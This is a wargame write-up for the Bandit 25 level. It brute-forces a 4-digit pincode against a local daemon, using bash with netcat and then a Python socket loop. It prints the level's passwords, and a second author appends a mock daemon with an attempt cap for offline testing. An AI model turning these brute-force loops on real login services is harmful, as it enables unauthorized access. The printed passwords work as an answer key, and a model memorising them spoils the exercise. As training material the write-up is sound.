Bandit 25
Objectives
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
Solution
a bit frustrated with this one
I spent way too long on this because my connection to the daemon would time out. I was only getting to around try 7000 and of course the correct port was beyond that.
First I generate a pass list to throw at netcat
I've started with just 8000 - 9999
#!/bin/bash
# bandit24 password followed by every candidate pin in the chosen range,
# appended (>>) so pass.txt collects one line per pin instead of being overwritten
hash=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
for i in {8000..9999}
do
  echo "$hash $i" >> pass.txt
done
which generates a pass.txt file with lines like this in it:
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9978
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9979
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9980
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9981
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9982
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9983
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9984
Then I throw that at netcat with a grep filter to filter out wrong as a response
$ cat pass.txt | netcat localhost 30002 | grep -vE 'Wrong'
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.
now in python
I attacked this one a little differently, using a socket instead of netcat to pass the values to the daemon. That eliminated my need to create a txt of all possible combos. I instead wrote the response from the daemon to a file that I could grep... Knowing the correct port, I started the brute force at 8500.
import socket

pass24 = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ'
counter = 8500
f = open("tries.txt", "w+")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = 'localhost'
port = 30002
s.connect((host, port))
for x in range(500):
    stringy = str(counter)
    line = pass24 + ' ' + stringy + '\n'
    s.send(line.encode())   # sockets take bytes, not str
    # the daemon's reply (the banner on the first pass) tagged with the pin just tried
    attempt = s.recv(1024).decode() + stringy + ' '
    counter = counter + 1
    f.write(attempt)
f.close()
s.close()
Then a quick grep of the tries.txt file gives us the answer.
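Both the netcat pipe and the socket loop above are the same protocol exchange: the daemon sends a banner, then answers each "<password> <pin>" line with Wrong! or Correct!. The following added example is mine, not the post's or the level's code. It runs that exchange end to end offline against a mock of the daemon, using constructed stand-ins for both passwords and a zero-padded pin so the whole 0000-9999 space is covered rather than only 8000-9999. The max_attempts cap on the mock is an assumption added to show the defender's side: the level is only brute-forceable because its checker accepts unlimited guesses, and a small per-connection cap ends the run long before the space is exhausted.

```python
import socket
import threading

# Constructed stand-ins; the real level's passwords are deliberately not used here.
PASS24 = "constructed-bandit24-password"
PASS25_LINE = "The password of user bandit25 is <placeholder>"
PIN_SPACE = 10000  # a 4-digit decimal pincode: 0000..9999

BANNER = (b"I am the pincode checker for user bandit25. Please enter the password "
          b"for user bandit24 and the secret pincode on a single line, separated by a space.\n")


def serve_checker(conn, secret_pin, max_attempts=None):
    """Mock of the level's daemon: send the banner, then answer each
    '<password> <pin>' line with 'Wrong!' or 'Correct!'. The max_attempts
    cap is an assumed defensive addition, not level behaviour.
    Returns the number of attempts processed."""
    attempts = 0
    buf = b""
    with conn:
        conn.sendall(BANNER)
        while True:
            chunk = conn.recv(4096)
            if not chunk:            # client hung up
                return attempts
            buf += chunk
            while b"\n" in buf:      # one guess per line, frame on newlines
                line, buf = buf.split(b"\n", 1)
                attempts += 1
                if max_attempts is not None and attempts > max_attempts:
                    conn.sendall(b"Too many attempts. Exiting.\n")
                    return attempts
                parts = line.decode(errors="replace").strip().split(" ")
                if len(parts) == 2 and parts[0] == PASS24 and parts[1] == secret_pin:
                    conn.sendall(b"Correct!\n" + PASS25_LINE.encode() + b"\nExiting.\n")
                    return attempts
                conn.sendall(b"Wrong! Please enter the correct pincode. Try again.\n")


def start_mock_daemon(secret_pin, max_attempts=None):
    """Listen on an ephemeral localhost port, serve one client in a
    background thread, and return the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        srv.close()
        serve_checker(conn, secret_pin, max_attempts)

    threading.Thread(target=run, daemon=True).start()
    return port


def brute_force_pin(host, port, start=0, stop=PIN_SPACE):
    """Send candidate pins over a single connection, one per line, and parse
    each reply before sending the next. Returns (pin, bandit25_line) on
    success, (None, None) if the range is exhausted, or (None, reply) if the
    daemon answers something other than Wrong!/Correct! (e.g. a lockout)."""
    with socket.create_connection((host, port), timeout=5) as s:
        f = s.makefile("rwb")
        f.readline()                     # discard the banner
        for pin in range(start, stop):
            f.write(f"{PASS24} {pin:04d}\n".encode())
            f.flush()
            reply = f.readline().decode()
            if reply.startswith("Correct!"):
                return f"{pin:04d}", f.readline().decode().strip()
            if not reply.startswith("Wrong!"):
                return None, reply.strip()
    return None, None


if __name__ == "__main__":
    port = start_mock_daemon("8537")
    print(brute_force_pin("127.0.0.1", port, 8000, PIN_SPACE))
    port = start_mock_daemon("8537", max_attempts=10)
    print(brute_force_pin("127.0.0.1", port, 8000, PIN_SPACE))
```

Reading exactly one reply line per guess through makefile() keeps the client in step with the daemon; a bare recv(1024) after each send, as in the post's loop, can return a partial reply or two replies coalesced, which is what makes the grep over tries.txt necessary in the first place.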